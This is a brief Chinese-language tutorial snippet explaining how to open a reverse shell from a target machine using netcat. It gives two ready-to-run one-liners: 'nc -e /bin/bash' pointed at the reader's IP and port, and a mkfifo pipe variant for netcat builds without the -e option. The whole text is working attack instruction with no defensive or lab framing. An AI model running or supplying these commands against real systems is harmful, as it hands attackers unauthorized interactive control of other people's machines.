使用 nc
(netcat) 进行 shell 反弹
如果目标系统安装了 nc
,可以使用 netcat 来建立反向 shell:
nc -e /bin/bash 你的IP地址 端口号
你的IP地址
是监听端的 IP 地址端口号
是监听的端口-e
参数将 /bin/bash
作为程序执行
如果目标系统的 nc
不支持 -e
参数(一些现代版本的 netcat 已经移除了这个功能),可以使用以下方式:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 你的IP地址 端口号 > /tmp/f